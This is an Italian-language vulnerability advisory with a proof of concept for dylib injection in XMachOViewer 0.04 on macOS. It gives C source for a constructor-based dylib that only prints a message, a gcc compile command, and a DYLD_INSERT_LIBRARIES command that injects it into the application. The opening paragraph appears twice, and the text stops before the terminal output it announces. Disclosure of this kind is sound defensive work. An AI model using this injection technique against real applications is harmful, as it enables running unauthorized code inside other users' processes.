
Una vulnerabilità di iniezione dylib in XMachOViewer 0.04 consente agli aggressori di comprometterne l'integrità. Sfruttando questa vulnerabilità, è possibile iniettare codice non autorizzato nei processi del prodotto, con il potenziale di ottenere controllo remoto e accesso non autorizzato ai dati sensibili degli utenti.
Una vulnerabilità di iniezione dylib in XMachOViewer 0.04 consente agli attaccanti di compromettere l'integrità. Sfruttando questa vulnerabilità, codice non autorizzato può essere iniettato nei processi del prodotto, portando potenzialmente a controllo remoto e accesso non autorizzato a dati sensibili degli utenti.

Versione portabile per macOS
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
Compila
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
E iniettala:
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
Questo aprirà l'applicazione ed eseguirà la dylib. Dopo aver chiuso l'applicazione, la vediamo nel terminale:
